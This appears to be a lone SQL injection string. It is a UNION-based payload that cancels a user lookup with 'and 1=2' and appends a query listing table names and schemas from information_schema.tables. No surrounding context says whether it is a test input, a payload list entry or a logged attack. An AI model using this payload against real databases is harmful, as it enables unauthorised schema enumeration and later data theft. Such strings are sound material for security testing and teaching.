select name, email from users where id = 1002 and 1=2 union select table_name, table_schema from information_schema.tables
